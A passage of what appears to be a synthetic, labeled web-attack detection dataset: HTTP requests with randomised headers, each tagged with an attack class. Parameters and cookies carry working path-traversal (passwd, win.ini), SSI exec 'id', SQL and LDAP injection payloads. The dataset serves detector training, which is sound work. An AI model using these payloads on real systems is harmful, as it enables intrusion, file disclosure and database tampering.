Warning: 748 128.223.205.211 "rct2raef1cbRxNsh" "Tue, 05 Dec 06 11:57:17 CET"
X-Forwarded-For: 12.245.148.199
X-Serial-Number: 4642917448355
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ot=3;Cei/egs3thtincludeH&rUTwwYqNB=/,,,/athiatu/Icimu/passwd

End - Id: 46116
Start - Id: 45691
class: PathTransversal
GET /w2o6azmiejojs0qm/naiYexeA/dtx4/llVV6pEfSGV8eYMGL/jFXLiqPZ_MgFXgmail/cNsh/n9EMHmASz5t6j/a1U2xxWMbaDH2qT/u7U5Mgc8.cfm?etfa=o-P-Pm&sroteaalmti=4&Mechofg0aid4=+stmp+d&teegdar1e=38069592&-en5npPeNc84=w%3A%5C%5CWINNT%5C%5Cwin.ini&nmp=rdr0apdeonemlafhtd&rttitima=eOautoexectdlocation&uiiwtlEtykicrij=rb&ygL6=n+pe4netcattmaddropi&2stfoao6di5=%3Da1 HTTP/1.0
Host: www.iebiQsno.gov
Connection: close
Accept: */*;q=0.0
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 164.82.154.228
Cookie: esuos=1t1hen6rmd;DTvSTM-=uaws;scasen1on=7269679;d8aVaaaoz=fynxEDoDxWG;s5e2H1eehs=5 hghttp)t|h
Cookie2: $Version="64"
Date: Wed, 11 Feb 09 16:20:08 UTC
ETag: "te5LXUt5O3OOLfUO"
Expect: ttonmd1=m6aEgHy
From: esIpsioy@eehlxsang.it
If-Modified-Since: Wed, 01 Jun 05 04:33:33 GMT
If-Unmodified-Since: Fri, 10 Jun 05 04:46:25 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 18 Jul 09 14:32:22 UTC
Max-Forwards: 9
MIME-Version: 5.2
Pragma: stz='y'
Proxy-Authorization: Digest nc=dFd20C70
Authorization: NTLM Y3ZjZWhsZGVhdWNoZWVhYWFzZjNwb1hpZXdqbGVsM2lhZUN0bmZUZXJpYXAyeTE=
Range: -934,-807,-703421
Referer: http://www.m7pstqeE.biz/oeiweEsb.gif
TE: gzip;q=0.7
Trailer: If-None-Match
User-Agent: Mozilla/3.7 (X11; U; Linux i586 8.5; El-th; rv:8.6.4) Gecko/07961866
UA-CPU: StrongARM
UA-Disp: 3926,182,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 6938x271
Via: FTP/5.6 www.3ioEfoao.css, efdyu/3.0 161.34.108.231, HTTP/7.9 45.242.169.133
Transfer-Encoding: eeahs; tshew=eehdle
Upgrade: Weyge/4.5, 12qen/6.1, nL6/9.1, 0dpMle/5.5, aosm8/0.7
Warning: 416 www.s8no.css "erg5ewnaswmt7ceb" "Wed, 30 Jan 08 22:16:24 GMT"
X-Forwarded-For: 147.237.198.55
X-Serial-Number: 1618317
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45691
Start - Id: 37946
class: LdapInjection
GET /sse.asmx?nqWzssDeeod6rt=olfnnttw&eaitev=selecte%40&dpraE77xoycrtxg=9ialn&uyitivBaiwtsl4d=9152951&Rsvteh=hd9retIsc78d&L9FPperlaEI-=mhWMq4ndk8&tMromu=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&bienpbTiZsKl1=074827&atRpevqtoTien=ecz8nppn+ntcleand HTTP/1.1
Host: www.tkd51Ktia.be
Connection: Otrtn
Accept: */*
Accept-Charset: *
Accept-Encoding: identity, compress, deflate;q=0.9, compress, compress
Accept-Language: h-luh0icpp, doiaT-i;q=0.1, yvmrihlm-a;q=0.5, anteh-8rne, B-se34oeS;q=0.3
Cache-Control: no-cache
Client-ip: 12.199.217.122
Cookie: sexaxC7bt=dA Tc;hOetqew=174164
Cookie2: $Version="2"
Date: Mon, 08 Oct 07 07:17:10 UTC
ETag: "aUGFuRHW-zMYOvq2nU"
Expect: 100-continue
From: p2udarel@zentnnsmu.org
If-Modified-Since: Fri, 01 Apr 05 17:43:18 UTC
If-Unmodified-Since: Mon, 20 Dec 04 16:45:23 GMT
If-Match: *
If-None-Match: "50JG9_b25xdD8wTN2U"
If-Range: "Rac18572haXkQj6nt-hB"
Max-Forwards: 98
MIME-Version: 3.4
Pragma: eptnNn=r
Proxy-Authorization: Digest username="toobo"
Authorization: NTLM anRySWl0c2V4ZXJsOG5uZ2FpbTFvcm5icHRyM2djdHJzYWZoYWNLdDZocm8=
Range: 648492-,076146-138301,-5163
Referer: http://6mn0.st/asoscaex/Oio5r.ace
TE: chunked,deflate,gzip;q=0.2
Trailer: If-Range
User-Agent: n.GDu7@h9 http://www.et1ccra.de
UA-CPU: 68000
UA-Disp: 472,2226,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 8848x2681
Via: 6.8 www.eia6hEei.jpg, FTP/1.9 251.221.152.201, 7.3 169.244.76.129
Transfer-Encoding: deflate
Upgrade: spoM3/2.4, sus/6.4, cez/4.2
Warning: 209 www.aRtos.png "mgfiafudiih" 
X-Forwarded-For: 143.12.94.194
X-Serial-Number: 8812591
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37946
Start - Id: 40162
class: SSI
GET /AxCArF_/otrj/ieTaeelecbteqreetrt/5Ag8AiAyj5ZC/1Y8iTnyhihitsJvAobaa/u0ntwlcoNne.tiff?ee3rem851Hci=%3C%21+%23%3C%21--%23exec++++cmd%3D%22id%22--%3E&pDd=7&dsnAfedrdnoi=h&metqmvoitejt=1745171486&biw2rlsw0e=ler7Cdencbpdud&TNLL0a=etfcetiTedbhatmemO&tEoai0Ao3nsVtmI=54681687 HTTP/1.1
Host: www.tees.org
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: no-transform
Client-ip: 12.182.155.135
Cookie: xEaiweccdhtl=450;w-dT=c7it;pfzi4dhdroef=aumttc2cmdewimgont;dmsywd= i1;eQietqer=L;usmyea=ssnshutdownpi0hatinrtn
Cookie2: $Version="14"
Date: Tue, 11 Nov 08 10:43:42 GMT
ETag: W/"jd5910xRTiaSO.mE"
Expect: 100-continue
From: stce@ygsk.st
If-Modified-Since: Mon, 23 Feb 09 15:22:16 UTC
If-Unmodified-Since: Mon, 12 Jan 09 09:27:46 CET
If-Match: "1cu-DfxpvmDwuPd8fOmp"
If-None-Match: "v@5CpcVraVUETDDQNvI"
If-Range: Sat, 26 Jul 08 09:39:19 GMT
Max-Forwards: 122
MIME-Version: 1.5
Pragma: 7nsyhnsi='ops'
Proxy-Authorization: NTLM Z3RhdW90YWpuN2NoYWdhZWUwaG1zcmV0ZkFpZWx0cmVkdDV0
Authorization: ytbe8 eo2t=gnnhede
Range: 728-,7-688430
Referer: /ezaq/iiscmahL.asmx
TE: trailers
Trailer: Warning
User-Agent: ceModWOR http://www.sa2mO.uk
UA-CPU: MIPS
UA-Disp: 832,4615,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 427x7361
Via: 0.0 20.23.193.181
Transfer-Encoding: compress
Upgrade: w70e/2.8, naoa/9.2, ror/0.7
Warning: 786 183.48.143.31 "bRilMsnty" 
X-Forwarded-For: 73.204.141.133
X-Serial-Number: 014833432
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40162
Start - Id: 41582
class: SqlInjection
GET /-0iLGpx/eepaa2j.tiff?@allsRACadminsR_M=063672&ec=0Rn%3E&gfesiiIasqat=izreUtgBiqz&e45pwrdlr7m=qwer%27+or+++Rnye_v.Account%3D%27vnO%40oi.com&oenn6tag=ektsw&senb9zoe=sis HTTP/1.1
Host: www.rzzedt.biz
Connection: keep-alive
Accept: application/postscript, video/*;q=0.9
Accept-Charset: euc-cn;q=0.0, cp-936, x-mac-arabic;q=0.9, iso-8859-1, iso-10646-ucs-2;q=0.0
Accept-Encoding: compress;q=0.4, gzip;q=0.7
Accept-Language: h-i;q=0.0, lisoatiO-zd;q=0.6, runweerl-oduSa
Cache-Control: min-fresh=2
Client-ip: 38.173.11.46
Cookie: sessiriri=unionscriptA2nivbscriptbetween1eefebarsfo;exiahceTHt5=%d~;hzie1uE9s4=62;atMsitsxee=dg3tnullicala;qrnsernua8th= ss;7h=@
Cookie2: $Version="8"
Date: Tue, 04 Apr 06 14:40:01 CET
ETag: W/"W0@RJky9TsVAqhWET"
Expect: 100-continue
From: xwfji@6eera.be
If-Modified-Since: Tue, 13 Jul 04 16:18:48 CET
If-Unmodified-Since: Sun, 11 Apr 04 21:54:00 GMT
If-Match: "f-qYG_DDORq5mdaMr57"
If-None-Match: *
If-Range: Mon, 03 Nov 08 17:00:35 CET
Max-Forwards: 3
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: NTLM b2xzb3NobDl0dG9mbWpvZTJmc2VmczJlZWhlZm10cWV0aHN1bGNvNmliZDg=
Authorization: NTLM aW91c3Nqa1d6dGhpRE5zaWhhaTJlcm0xaXl1dHdlMmh5eno2dG8=
Range: 57313-1061,-0,406-
Referer: /oeUsH7/ecw9inTe/stwdszol.php
TE: trailers,trailers,gzip
Trailer: If-Range
User-Agent: ocpnt/8.9.5.8.9
UA-CPU: StrongARM
UA-Disp: 989,4955,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 1236x139
Via: 1.0 90.253.117.188, HTTP/9.3 www.uehcE.jpg
Transfer-Encoding: identity
Upgrade: eia/5.7
Warning: 480 www.mfahnai.css "oldac4" "Mon, 15 Jun 09 01:00:23 UTC"
X-Forwarded-For: 166.15.230.232
X-Serial-Number: 124390233
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41582
Start - Id: 36080
class: PathTransversal
GET /orairdssaekeai4tege/UYhF_zFaccess_logs/nLDn4ass7duao1L/enqtvii7da0mthf/c9SF7gU87Bghn1K73cvv/EaaUIsTe/lFIDmcf0T.pl?xAtet=ishcs7bw&3a4wLato1ceessh=eomtA5r4ieeniuh&yrrnwbsqyodMoa=ta2dh5&fPimswi=+dv+Lsltn-da%298&Qedtnroe=oOti2sgac3noiqo&rii9=Goaiinegef&lse0i=955476&6erm=4&mr8der4lenTh=itatsloi&rhihmqInpl=zLFBbB8_3R7B&eermstCOsoaa=351476&mhoo=n8esitbjsitglaic3&iahr91ebimr=%5Cautoexec.bat HTTP/1.0
Host: www.gsEt.org:9310
Connection: close
Accept: */*
Accept-Charset: windows-1252, isiri-3342;q=0.2, x-mac-japanese
Accept-Encoding: gzip, gzip
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 189.28.10.96
Cookie: OvREtunshaiaeq=856ae|\e
Cookie2: $Version="080"
Date: Thu, 30 Apr 09 19:56:14 UTC
ETag: ".pe2aGJrRMzZbqnQAMiF"
Expect: 100-continue
From: Esva@5c4oorIai.it
If-Modified-Since: Tue, 02 Jan 07 09:51:21 CET
If-Unmodified-Since: Fri, 23 Nov 07 08:04:32 UTC
If-Match: *
If-None-Match: "2Bu-xL3QD33X6BRyUOnP"
If-Range: Thu, 01 Apr 04 09:09:13 UTC
Max-Forwards: 8
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: Basic N2Vod0U6YU9sbmY=
Authorization: diW0 aiue8nd=tsaL
Range: 67-310757
Referer: /escKma/bben/lh7fw/rosrirdr.cfm
TE: chunked;q=0.9,trailers,trailers
Trailer: Warning
User-Agent: ppia9ef5 (emAkmyoG)
UA-CPU: Sparc
UA-Disp: 6269,3972,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 039x0543
Via: 6.2 www.cdOb.tiff
Transfer-Encoding: identity
Upgrade: sztad/3.9, y9oto/3.0
Warning: 246 www.eofho2eh.shtml "ewcmspiaijfstirndeh6" "Fri, 05 May 06 17:12:43 GMT"
X-Forwarded-For: 45.91.182.246
X-Serial-Number: 6525817077743739404
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36080
Start - Id: 39818
class: SSI
GET /kreOpomEih/tP7n3/6V7I7inl1.bHF.I4.jpeg?6_QGo=%3C%21--%23include++++virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22++--%3E&mdsultfig=6774 HTTP/1.0
Host: 116.225.224.47
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: gzip;q=0.1, identity;q=0.1, identity, identity;q=0.9
Accept-Language: btsuoee-vfrx;q=0.5, cCbslq-heie;q=0.2
Cache-Control: max-stale
Client-ip: 179.116.196.3
Cookie: oLUxconnectnetcat4Xbgsoundcbj=3l7zjRB-fP3;SSseg8pe2K=379;9ho5sietoT=$bhonufuflr setolaccepto;hkOscriptjZo=665
Cookie2: $Version="15"
Date: Tue, 07 Feb 06 10:37:58 UTC
ETag: "I6yhHlZTU9vTgujE7k"
Expect: rsGesn
From: fEkbo16t@uycIttryA.biz
If-Modified-Since: Sun, 05 Nov 06 19:33:22 UTC
If-Unmodified-Since: Sat, 01 Nov 08 02:31:46 UTC
If-Match: "OupVMVmDesp.2lJfm4AE"
If-None-Match: "Nmc-0ouB@UgzXstw9tsc"
If-Range: Fri, 19 Mar 04 18:19:02 GMT
Max-Forwards: 27
MIME-Version: 8.2
Pragma: Psish=e2susee
Proxy-Authorization: Basic aWJlejJFUGk6dWVibGV3
Authorization: taxs reahho=t9eaicne
Range: 907419-6,527-485395,5-64
Referer: /mfi9cjwY.jsp
TE: chunked;q=0.7,trailers,trailers
Trailer: Connection
User-Agent: ay8lea5mh (rJPt_Und; le4339VAP; fvrLINKk6; aOmhMU4)
UA-CPU: Sparc
UA-Disp: 052,114,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 9632x079
Via: 9.4 232.33.104.2, FTP/0.7 87.1.80.182:9
Transfer-Encoding: gzip
Upgrade: oLt/5.9, tEgb/6.9, 6laet/2.7, faare2/0.4, vst20/6.5
Warning: 728 www.6meT.htm "tbadlt3aeEaT" 
X-Forwarded-For: 142.194.73.31
X-Serial-Number: 0280999804959
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39818
Start - Id: 46185
class: PathTransversal
GET /wBXUGZCNI/xagJxttmWQ6/kLhUTH.mdb?rcp40aDCbhMPMV=5139069511&zmA1=hatlem+he&scriptX4Ta=hlovoosrAs6o2anad&rt5i=ho%29&8sl2eta=dajgroup+byeraesnim%26phpw&ruNmdhI=416768806&adreo5w=9542603&wvsO4nerr7kto=69143231&n6y3fOslckhnewf=%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2FvR.conf&iiugouand2=hcw&ifelogadRae=6&DcaerL=%260r HTTP/1.1
Host: 74.97.116.181:80
Connection: keep-alive
Accept: */*
Accept-Charset: koi8;q=0.7, windows-1253
Accept-Encoding: *;q=0.5
Accept-Language: n0pc-lsiUlo;q=0.7, p4man-eN
Cache-Control: no-cache
Client-ip: 68.94.47.234
Cookie: lrfhsueeonsecbi=35;pea3esOf=31068;wb@YFossd=1slstdinmnddda;t2aehdl=10729279;4deuFEB=e;ar3
Cookie2: $Version="82"
Date: Wed, 07 Jan 04 02:01:18 UTC
ETag: W/"3X8b88a8UJS_tx_cxgs"
Expect: 100-continue
From: Hue2dlm3@crhocb.gov
If-Modified-Since: Tue, 02 Mar 04 17:16:24 GMT
If-Unmodified-Since: Thu, 28 Oct 04 02:25:45 UTC
If-Match: "gBdVIw-rg8PGms5in1U"
If-None-Match: *
If-Range: Sat, 21 Feb 09 23:06:31 UTC
Max-Forwards: 34
MIME-Version: 9.2
Pragma: ksnewco='b'
Proxy-Authorization: 9esi xlsrt=e623
Authorization: Digest response="a9e5F10D9dffdBcbdAD1c7071a9ff3dA"
Range: -423
Referer: http://www.Yafaz.uk/veonHl.gif
TE: gzip
Trailer: If-Unmodified-Since
User-Agent: retAnnIeccBG
UA-CPU: x86
UA-Disp: 411,052,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 939x7286
Via: 6.5 185.106.63.180
Transfer-Encoding: gzip
Upgrade: amiap/9.1
Warning: 885 150.132.83.196:7 "UN6M8draouta3nienwag" 
X-Forwarded-For: 249.22.33.20
X-Serial-Number: 726425305540692
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46185
Start - Id: 40145
class: SSI
GET /6vsTe3ro/Thqtnnhu/oeipqeymg1rruafay/nw/8Jgirhor4sA/M9dW0group by0QbB/uwtir/t159VHD/t37aUrtj8eStne8arldj/TqL/ROh8T4cOfromKe.sh?bsDYAA=lobdEsT9ax&anktln=%3C%21++%23%3C%21--++%23exec+cmd%3D%22id%22--%3E&Oto=Nidwe+%28&aoI05erpiaghlhr=dieiHyeirKa7h&b9sntlrtemcne=wG9cs0a&sta=71&nrsgTwedtieyect=Dnu&tyn=r8rxp_ainsnls%40spositione&ohcd8oefnA=284060&donybrt=m8nbi%2Bexec4esla&ehxli=rTrrSgat5ilai2gd6t&cs=fodas&e9yg=hBN8&FacceptS6=wIdJqx%40A06_g HTTP/1.0
Host: 46.95.49.124
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: x-mac-roman, x-mac-chinesetrad;q=0.1
Accept-Encoding: identity, identity;q=0.5
Accept-Language: *;q=0.4
Cache-Control: max-age=16309
Client-ip: 40.73.55.49
Cookie: tY-17=5NJwv;h5i8mllmoynle=4Ate]
Cookie2: $Version="9"
Date: Sun, 19 Aug 07 22:48:21 GMT
ETag: W/"_TCaJzrRfrLzY7eh7TC"
Expect: 100-continue
From: stce@ygsk.st
If-Modified-Since: Thu, 11 Mar 10 11:51:36 UTC
If-Unmodified-Since: Mon, 28 Jul 08 18:04:29 GMT
If-Match: *
If-None-Match: "o3XDB-0aKa0nStG"
If-Range: Tue, 06 May 08 11:08:00 UTC
Max-Forwards: 5
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Basic SWJlbHQ1dGw6M25Tbm50ZQ==
Authorization: r235Br ata9=syae
Range: 543-5,-37763,-41932
Referer: http://lUkym.biz/udvnupDr.swf
TE: trailers,trailers
Trailer: Accept-Encoding
User-Agent: Izdhdrgcdmi3Rluese
UA-CPU: MIPS
UA-Disp: 832,4615,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 5714x2082
Via: FTP/3.1 www.8hkuh.css
Transfer-Encoding: deflate
Upgrade: llr4iH/0.1, ihexp3/7.5, 4cG/7.6, txi/6.5
Warning: 567 250.136.1.216:51630 "tiectbulaky" "Fri, 20 Jul 07 07:00:48 CET"
X-Forwarded-For: 17.71.219.93
X-Serial-Number: 7694674190970
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40145
Start - Id: 45546
class: PathTransversal
GET /uuerlreit0raa4at/EXB_N/cj/nqs5POLav/nrhE.jpg?qddeU4ghgf=ltei&exvt1m=h%5D2nexe%3Esxaeo&toitlGt=%28fainodemhr71zjwnm&iaehpoyhaNnCT=etguuEonAaqeNoeE&ztcdnt2otapRcvi=09&eewtaflkn=r&chlu4huw1sserb=kno8szhpnocditns&cT0nisma=%2F..%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Fas%2Fnatr%2Freitre%2Fis.mspx HTTP/1.0
Host: www.gaaonsyheb.be
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *;q=0.2
Accept-Encoding: identity;q=0.6, deflate;q=0.0, compress;q=0.8, compress, identity
Accept-Language: *
Cache-Control: max-stale
Client-ip: 15.78.136.11
Cookie: hzrArkq=a q;Ihnsiln=7324;tDteebs2=kf@Ch2bew
Cookie2: $Version="4"
Date: Mon, 24 Dec 07 05:51:25 GMT
ETag: W/"PFUNEE-2p-Js2P9AZMS"
Expect: 100-continue
From: hwpha@Suan.org
If-Modified-Since: Sat, 06 Aug 05 09:55:35 UTC
If-Unmodified-Since: Sat, 06 Mar 10 07:01:12 GMT
If-Match: "-A3CIfTtiK600ilLm"
If-None-Match: *
If-Range: *
Max-Forwards: 79
MIME-Version: 3.3
Pragma: i5H2n='hkcuc'
Proxy-Authorization: NTLM ZXBzeGFlbkxta3QwRGRkcnB5YXBtcTBGbmU4YXJuY2FpTjhkaGx0
Authorization: NTLM dmFzZm1ua29vT3NjZW5mZHd0ZXJ0YWFzOERsdWlKZVR1Z2NuY3JrbzBy
Range: 903-3,3-4324,-8
Referer: /ianrarr/nnm6B/oWecpt/c1pta/iiLised.zip
TE: deflate;q=0.6,trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: Thocspst (qTrsEXe; o71D9z38)
UA-CPU: 68000
UA-Disp: 6548,353,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 220x9820
Via: HTTP/4.3 www.wnnwiisi.html, FTP/8.4 205.228.24.78:45
Transfer-Encoding: deflate
Upgrade: vleih/1.8, zzq/8.8, etwstn/4.5, eseo/9.8, ilezr/6.6
Warning: 278 227.248.46.198:699 "ihqt4i1" "Mon, 16 Jul 07 06:16:16 UTC"
X-Forwarded-For: 145.196.47.34
X-Serial-Number: 86157391207979195
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45546
Start - Id: 46022
class: PathTransversal
POST /jX@NbcrH@8i4AwB-/dSjDP2E1N_24/d0yrt/tDjDa2VfVYPSfut/eYHMWP@.xxfB3Kv/7gza9renamqs/d5/mEa/ereoiulef5czotH/ov_BvAxx9wf/3zF3betweenCLd/gsUnz@xJYmwl49U1qm.shtml? HTTP/1.0
Content-Length: 126
Content-Encoding: identity
Content-Location: /aUdolyw.pdf
Content-MD5: YW5kcmUxYWVlaW9wcnRuaA==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Mon, 01 Feb 10 20:24:45 GMT
Host: www.ehiioe.st
Connection: gsekj
Accept: */*
Accept-Charset: *;q=0.4
Cookie: tgoolt=145;ugleololguh=..\..\..\..\..\..\..\..\..\WINDOWS\system.ini;anrwgksl2n2klor=enwtihhhqeww
Cookie2: $Version="77"
ETag: W/"OEr-snbqgsCXUoDW"
Referer: http://adpo9n.gov/eiaahuvt/freban.cfm
User-Agent: Mozilla/1.7 (Windows; U; WinNT 2.9; oN-hb; rv:4.3.3) Gecko/48235512
Transfer-Encoding: identity

c0trfean=025&ap20Fk8Q=$tth&tiil4lbeo3xenr=tiyoinsertconnecth\ueexml&wZselo2dh3gc=owwfgshs7hho0decy&aeh=4552426&eAhDd6=sylw

End - Id: 46022
Start - Id: 46379
class: PathTransversal
GET /zmyHuCGEp2jwwCCN@KRA/uhN/rhEfoiukniesi/hi9qmkCPAgqy6l2J/0jzfKGh@y37c/tot3antgu6todm6Tosst/1oyt9saw.js?htldetr=%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fj0u.conf&xdscnseteat=63363645&edoutpkowtz=2735&lreTtdjeiheba=pxl HTTP/1.1
Host: www.qrpl.cz
Connection: crrt
Accept: audio/*;q=0.0
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: hluoy1-rtS1Deix
Cache-Control: no-transform
Client-ip: 86.247.207.18
Cookie: gkubtnlRh5td88t=t_qs;aE=shneiaaeorByE;alus7biKdqeeeFi=d;sdeAS=w0sici1rsvsecsis
Cookie2: $Version="86"
Date: Sun, 17 May 09 21:38:24 UTC
ETag: "GFsg.faK@trgN@CsoV"
Expect: 100-continue
From: cewts@1fgr.fr
If-Modified-Since: Thu, 05 Oct 06 16:33:05 GMT
If-Unmodified-Since: Mon, 28 May 07 04:30:42 GMT
If-Match: "yFdmSonnJ7l7G-bTqn"
If-None-Match: "5bMTjNrRklghvj6T@"
If-Range: "wNk.zC30bLAvh.Qwl"
Max-Forwards: 46
MIME-Version: 0.4
Pragma: bwend='iOjeb'
Proxy-Authorization: NTLM YWFHbUVzVWVJY2E0dmY0bHNybWVkbnJuUmJlMHNhamlobG8zdXM=
Authorization: eIymk ItnthXy=ursdHCat
Range: 2-1818,846125-
Referer: http://www.iNtatV.uk/hisow/jswuNa/1izhytta/gn71e/oatNteea.pl
TE: deflate
Trailer: Accept-Encoding
User-Agent: Pd2odbe3aO8aqe8sde
UA-CPU: StrongARM
UA-Disp: 4968,8587,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 3216x516
Via: o3r/9.7 148.141.3.138, nee/0.6 www.eaakn.jpeg
Transfer-Encoding: identity
Upgrade: EutP9q/0.0, tvoa/2.5, adr7m/4.2, mmn/1.2, egg2x/1.5
Warning: 191 www.ts61.gif "suticae" 
X-Forwarded-For: 241.79.66.180
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46379
Start - Id: 41789
class: SqlInjection
GET /jRntqc/nuiohelsi/neessushdnienkd/4Rb1g-/.YFlYqDq/nFeZpqZhbpW9K0eWU/7uAxdropD/tiosfhfknd5eSAnh/bHut7H59fRdnrLFt/GEa0ctiDmhusweuuhn4/z2U9HWaV/Vconnectc1mocha3g@.gif?wYFu2TJ6E8j=%3B+++++EXEC%28++%27INS%27%2B%27ERT+INTO+++users+++++values%2879%2C%27Di%27%2C%27vns3%27++%29%29&sngnLribs=d+re HTTP/1.0
Host: www.iznR.cz
Connection: close
Accept: text/*;q=0.4
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: no-transform
Client-ip: 112.56.209.56
Cookie: ettsealtd7ire= hrq;iperlbp1b.=ecaH0
Cookie2: $Version="3"
Date: Sun, 07 May 06 14:10:24 UTC
ETag: ".4g273Gu0e1YegQr"
Expect: e813nRi=Rjetwieo;hsuvez=0ens
From: nIeior@tiriRlyas.net
If-Modified-Since: Mon, 25 Apr 05 05:39:38 CET
If-Unmodified-Since: Tue, 30 Jan 07 01:15:39 CET
If-Match: "8Pum.frRG9Mt@OdzqDl"
If-None-Match: "EPch6cTst6aE8s6O8W"
If-Range: Wed, 25 May 05 13:40:47 GMT
Max-Forwards: 6975
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: bn6u eNiil=ettssimU
Authorization: nkoe63 beoeYB=Norx
Range: -47,-6912
Referer: http://sPraoml.be/egrtuliK/8Aee/Er6omq/snwNthy2/lstoa1a.cfm
TE: gzip,trailers,deflate;q=0.4
Trailer: Upgrade
User-Agent: cjizitmioef2faPaUkk
UA-CPU: x86
UA-Disp: 885,1136,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 832x0332
Via: FTP/8.6 46.11.234.136, FTP/4.2 www.al5aNwo.js:35, 0.1 114.78.57.184
Transfer-Encoding: identity
Upgrade: ooo/9.2, 8pcmnn/1.5
Warning: 328 www.aeePtha.gif "090pevlaxa3e8csta7a" "Fri, 15 Sep 06 14:42:50 UTC"
X-Forwarded-For: 234.161.201.75
X-Serial-Number: 79451842006720281
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41789
Start - Id: 41666
class: SqlInjection
GET /e6_EE-m3/PFpasswdQBgroup by/edHsaen/lZt8v8@6no2oAAiWNcY5/i7rdhxcmerrkndn.sh?mlS7ha=27&Aler0n=875135&xk2-httpz.binJS=OR+++%27aoshnxuh%27+++%3D+++%27+++%27&rri=43638&Hqaisw=40t0je&HKrW3q=mt%29re&aiadhipdxsR45=ruRVQkEY%40T HTTP/1.1
Host: 153.78.93.0
Connection: keep-alive
Accept: application/*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: Lasimeos-l2wese
Cache-Control: no-cache
Client-ip: 239.57.78.114
Cookie: hptS3hHrao=hlthaccess_logEulandm;dlaneritanped=3068105;ahntl=4I4DVC;p9l4hAv=165;PacI=1970
Cookie2: $Version="5"
Date: Sun, 07 Mar 04 12:30:54 UTC
ETag: "FH8-9ZBlEp69RKFe"
Expect: tdqm
From: xwDNo@mseaaa.st
If-Modified-Since: Tue, 06 Nov 07 24:16:27 CET
If-Unmodified-Since: Mon, 23 Nov 09 09:06:15 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 14 Jul 07 19:51:17 GMT
Max-Forwards: 8477
MIME-Version: 9.5
Pragma: rlitR9S=noasnay
Proxy-Authorization: ewnBd ycpeari1=oiYepi
Authorization: Digest username="tiwoSh"
Range: -91,787-299778
Referer: /uhIa/Dedob/dNb7nms/dote/rrahsaus.sh
TE: trailers
Trailer: Host
User-Agent: Mozilla/4.5 (X11; U; Linux i386 8.1; ws-nt; rv:8.1.8) Gecko/24144410
UA-CPU: MIPS
UA-Disp: 2834,2406,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 232x3893
Via: 6.1 www.iedatda.js, 8.2 www.eioe.gif, FTP/0.1 227.63.33.150
Transfer-Encoding: compress
Upgrade: i2e/5.2, E6w/3.7, mge/6.8
Warning: 530 32.109.118.103 "hOGeuun3sa018i" 
X-Forwarded-For: 236.249.18.77
X-Serial-Number: 611965021882313
----: ------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 41666
Start - Id: 46770
class: XSS
PUT /taZqGxIpfZa.quuijfIU/.BwYH/z0Z@S7-RZjoOYpsrTv89/aCVk8gLK9MxWbt/srrnehexrhfftmwed/zW5GVGn/PVeOJqfetcinsertF_o_aV/RautoexecTBYK_.mochaXSI3/Wynotradeensps.mdb? HTTP/1.1
Content-Length: 285
Content-Language: veeeil1s,rRir,Sa0foe
Content-Encoding: deflate
Content-Location: /Reoot.mspx
Content-MD5: d3FzYzUyaXFmdWVjMWV3YQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 19 Dec 08 15:55:08 GMT
